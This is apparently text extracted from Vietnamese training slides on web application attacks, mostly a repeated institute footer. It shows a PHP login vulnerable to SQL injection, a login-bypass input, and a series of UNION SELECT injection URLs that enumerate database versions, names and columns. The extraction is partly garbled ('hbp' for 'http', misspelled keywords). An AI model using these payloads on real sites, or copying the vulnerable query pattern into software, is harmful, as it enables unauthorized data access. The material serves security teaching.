Kỹ thuật tấn công ứng dụng trên web

SECURITY Career Institute of Network Security – istudy.edu.vn Trình  bày:  Chuyên  viên  an  ninh  mạng  Lê  Nguyễn  Trường  Giang   SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn Ø Xây  dựng  và  triển  khai  ứng  dụng  Web   SECURITY Career Institute of Network Security – istudy.edu.vn Ø   Hạ  tầng  ứng  dụng  Web   SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn Ø   Ứng  dụng  Web:   SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn $name  =  $_REQUEST['name'];   $passwd  =  $_REQUEST['passwd'];   $query_string  =  "SELECT  *  FROM  users  WHERE  username  =   '$name'  AND  password  =  '$passwd'";                  Login:                    Password:     SELECT  *  FROM  users  WHERE  username  =  ’admin’  -­‐-­‐    '  AND   password  =  ’;   SECURITY Career Institute of Network Security – istudy.edu.vn CorpSite Forum_data ?????_data INFORMATION_SCHEMA users Id User Pass 1 Admin 123 10 Guess guest Sản phẩm col1 col2 coln … … … Tin Tức col1 col2 coln … … … SECURITY Career Institute of Network Security – istudy.edu.vn 1.  hbp://[site]/page.asp?id=1  UNION  SELECT  ALL  1,2,3,4-­‐-­‐   2.  hbp://[site]/page.asp?id=1  UNION  SELECT  ALL  1,DB_NAME,3,4-­‐-­‐     3.  hbp://[site]/page.asp?id=1  UNION  SELECT  ALL  1,@@VERSION, 3,4-­‐-­‐   4.  hbp://[site]/page.asp?id=1    UNION  SELECT  ALL  1,column_name, 3,4  from  DBNAME.informaWon_schema.columns  where   table_name='TABLE-­‐NAME-­‐1'-­‐-­‐     5.  hbp://[site]/page.asp?id=1    UNION  SELECT  ALL  1,COLUMN-­‐ NAME-­‐1,3,4  from  TABLE-­‐NAME-­‐1-­‐-­‐   SECURITY Career Institute of Network Security – istudy.edu.vn hbp://xxx.com/newsDetail.php? id=8  union  seclect  1,@@version,   column_name,4,5,6,7  from   InformaWon_schema.columns-­‐-­‐   SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn SECURITY Career Institute of Network Security – istudy.edu.vn